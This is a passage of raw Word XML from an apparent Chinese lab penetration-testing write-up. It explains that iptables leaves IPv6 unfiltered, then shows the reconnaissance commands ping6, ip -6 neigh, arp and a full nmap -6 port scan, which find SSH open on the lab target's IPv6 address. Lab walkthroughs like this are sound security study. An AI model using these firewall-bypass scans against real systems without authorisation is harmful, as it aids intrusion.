    <w:p w14:paraId="2C2219EF" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00C830CF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ED10F55" wp14:editId="00989B54">
            <wp:extent cx="4733925" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="73795299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52990" name="图片 1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9081" w14:textId="77EBC6E2" w:rsidR="00C830CF" w:rsidRPr="005E413E" w:rsidRDefault="00B024AF" w:rsidP="00B024AF">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="24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</w:p>
    <w:p w14:paraId="702362AC" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00A67B14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4F78D70" wp14:editId="77F9B802">
            <wp:extent cx="3143250" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="680596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962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0612" w14:textId="55D3C39A" w:rsidR="005E413E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</w:p>
    <w:p w14:paraId="2C8C6BF9" w14:textId="77777777" w:rsidR="004E6CE1" w:rsidRDefault="00B70BB0" w:rsidP="007A0F32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如果该</w:t>
      </w:r>
      <w:r w:rsidR="00A6141C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>采用的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidR="00A6141C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为防火墙，那可能会遗漏对</w:t>
      </w:r>
      <w:r w:rsidR="00A6141C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="00A6141C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口的过滤，因为</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>只能过滤</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv4</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iptables6</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>才能过滤</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="00B86F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不仅如此，</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>往往</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>很多情况下靶机的用户都会忘记对</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置防火墙规则，而只对</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv4</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95" w:rsidRPr="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置了防火墙规则</w:t>
      </w:r>
      <w:r w:rsidR="006B0A95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A5B4A5" w14:textId="2FADE8CF" w:rsidR="002F668E" w:rsidRDefault="001640B0" w:rsidP="006B1301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尝试</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ping6</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描网络内的</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="009A632D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B26E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令行输入</w:t>
      </w:r>
      <w:r w:rsidR="00B26E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ping6 -I eth0 ff02::1</w:t>
      </w:r>
      <w:r w:rsidR="00B26E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r w:rsidR="00457DDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-I</w:t>
      </w:r>
      <w:r w:rsidR="00457DDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指定扫描的网络所在的网卡，</w:t>
      </w:r>
      <w:r w:rsidR="00285903" w:rsidRPr="00285903">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ff02::1</w:t>
      </w:r>
      <w:r w:rsidR="00285903">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表广播</w:t>
      </w:r>
      <w:r w:rsidR="00285903">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="00285903">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>广播地址。</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后输入命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -6 neigh show</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看扫描到的所有</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，通过</w:t>
      </w:r>
      <w:r w:rsidR="00B02AC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B02AC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B02AC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.150</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="003A6A1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="006B1301" w:rsidRPr="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>08:00:27:93:5f:db</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，其对应的</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="006B1301" w:rsidRPr="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fe80::a00:27ff:fe93:5fdb</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B26E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看开启的服务</w:t>
      </w:r>
      <w:r w:rsidR="00B26E07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00526891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00526891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00526891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -6 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00526891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00526891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:r w:rsidR="006B1301" w:rsidRPr="006B1301">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fe80::a00:27ff:fe93:5fdb</w:t>
      </w:r>
      <w:r w:rsidR="000A0D56" w:rsidRPr="000A0D56">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%eth0</w:t>
      </w:r>
      <w:r w:rsidR="00CD0C81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现</w:t>
      </w:r>
      <w:r w:rsidR="0045651D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ipv6</w:t>
      </w:r>
      <w:r w:rsidR="0045651D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="0045651D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="0045651D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00CD0C81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是打开的</w:t>
      </w:r>
      <w:r w:rsidR="0045651D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，并没有被防火墙过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E1F0B" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00B02AC7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F26AF42" wp14:editId="1E1B606E">
            <wp:extent cx="5274310" cy="1591310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="211251518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05525" name="图片 1" descr="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E2B3" w14:textId="13276BCE" w:rsidR="00B02AC7" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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</w:p>
    <w:p w14:paraId="3732E5EE" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="003A6A1B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3598FB29" wp14:editId="19D5F41C">
            <wp:extent cx="5274310" cy="1431925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="159906108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61086" name="图片 1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756C" w14:textId="23E279AB" w:rsidR="003A6A1B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</w:p>
    <w:p w14:paraId="1662BE55" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00B02AC7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B2DA39F" wp14:editId="054BDB7B">
            <wp:extent cx="5210175" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="94184676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46769" name="图片 1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2BDC" w14:textId="18B53FB7" w:rsidR="002F668E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</w:p>
    <w:p w14:paraId="446AD12F" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00CD0C81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8852A6E" wp14:editId="5EA04130">
            <wp:extent cx="5274310" cy="1545590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="194332472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4724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2CC6" w14:textId="7F78B524" w:rsidR="00CD0C81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</w:p>
    <w:p w14:paraId="30D2FC45" w14:textId="3C548BBB" w:rsidR="00E457E8" w:rsidRDefault="00B41276" w:rsidP="00E457E8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利用之前容器</w:t>
      </w:r>
      <w:r w:rsidR="009F524E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="009F524E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="009F524E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户家目录下</w:t>
      </w:r>
      <w:r w:rsidR="009F524E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
